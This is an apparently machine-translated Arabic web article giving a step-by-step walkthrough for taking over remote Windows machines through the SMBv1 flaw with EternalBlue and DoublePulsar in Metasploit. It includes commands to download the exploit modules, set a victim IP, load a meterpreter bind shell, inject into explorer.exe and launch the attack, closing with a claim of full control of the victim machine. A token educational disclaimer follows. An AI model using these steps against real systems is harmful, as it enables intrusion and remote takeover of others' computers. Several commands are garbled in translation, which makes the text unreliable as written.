 |
| استغلال ويندوز الكمبيوتر عن بعد مع استغلال EternalBlue و DoublePulsar من خلال Metasploit |
البرامج الضارة EternalBlue التي طورتها وكالة الأمن القومي ( NSA ) والتي تستغل Windows Message Server Block Block (SMBv1) والتي يعتقد أن الأداة قد أصدرتها مجموعة Shadow Brokers hackers Group في أبريل 2017 ، وقد تم استخدامها من أجل Wannacry Cyber Attack.
يقبل SMB الإصدار 1 (SMBv1) في إصدارات مختلفة من Microsoft Windows الحزم المصممة خصيصًا من المهاجمين عن بعد ، وهذا هو سبب وجود هذه الثغرة الأمنية في نظام التشغيل windows مما يؤدي إلى تنفيذ Remote Code Execution الذي كان يستهدف بشكل خاص Windows 7 و XP.
تم تلقي أداة NSA Tool Called DOUBLEPULSAR المصممة لتوفير وصول خفي إلى نظام Windows ، فورًا من قِبل المهاجمين.
بمجرد التثبيت ، ينتظر DOUBLEPULSAR إرسال أنواع معينة من البيانات عبر المنفذ 445 . عندما يصل DOUBLEPULSAR ، توفر الزرع استجابة مميزة.
- EternalBlue Live Demonstration باستخدام Metasploit
نحن بحاجة لتحميل وإضافة الماسح الضوئي و استغلال لMetasploit. افتح النوافذ الطرفية الخاصة بك واكتب الأوامر التالية.
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
انقل الملف smb_ms17_010.rb أسفل المجلد / share / metasploit-framework / modules / auxiliary / scanner / smb
ثم يجب عليك نسخ Eternal Blue-Doublepulsar.rb و debs قيد الاستخدام / المشاركة / metasploit-framework / modules / mits / windows / smb
الآن افتح Eternal Blue-Doublepulsar.rb باستخدام أي محرر وقم بتغيير دليل المسار الخاص بـ ETERNALBLUE و DOUBLEPULSAR لاستغلال دليل استخدام / share / metasploit-framework / modules / exploits / windows / smb.
ثم يتعين علينا تحديد اسم العملية المراد حقنها ، وقد حددناها هنا على أنها explorer.exe
ثم يجب عليك تشغيل msfconsole واستخدام وحدة الفحص الإضافية smb_ms17_010.rb.
> استخدم /
show scanner / smb / smb_ms17_010 > خيارات العرض
الآن يجب عليك إعداد RHOSTS IP وهو عنوان الضحايا Ip.
> ضبط RHOSTS IP
> التشغيل
سيتم الانتقال والتحقق مما إذا كان المضيف ضعيفًا أم لا وسيعرض أيضًا تفاصيل الجهاز الضحية.
الآن يمكننا الانتقال إلى استغلال EternalBlue & Double Pulsar> استخدم exploit / windows / smb / eternalblue_doublepulsar
> تعيين windows.x64 / meterpreter / bind_tcp
> إظهار خيارات
ثم قم بتعيين بنية الهدف ثم عنوان IP RHOST Victim.
> setRHOST IP
> تعيين المستهدفة x64
> خيارات العرض
ثم اكتب استغلال وضرب دخول.
لقد تم القيام به الآن ، لقد حصلنا على جلسة المحول واستغل الضعف.
الآن تم استغلال النظام بنجاح ولدينا السيطرة الكاملة على الجهاز الضحية الآن.
يمكنك متابعتنا على Linkedin و Twitter و Facebook للحصول على تحديثات الأمن السيبراني اليومية ، كما يمكنك أن تأخذ أفضل دورات الأمن السيبراني عبر الإنترنت للحفاظ على تحديثك الذاتي.
تنصل
هذه المقالة هي فقط لغرض تعليمي. إن أي إجراءات و / أو أنشطة متعلقة بالمواد الواردة في هذا الموقع الإلكتروني هي مسؤوليتك وحدك. يمكن أن تؤدي إساءة استخدام المعلومات الموجودة في هذا الموقع إلى توجيه تهم جنائية ضد الأشخاص المعنيين. لن يتحمل المؤلفون و https://www.egypt-new.com/ المسؤولية في حالة توجيه أي تهم جنائية ضد أي فرد يسيء استخدام المعلومات الموجودة في هذا الموقع لخرق القانون.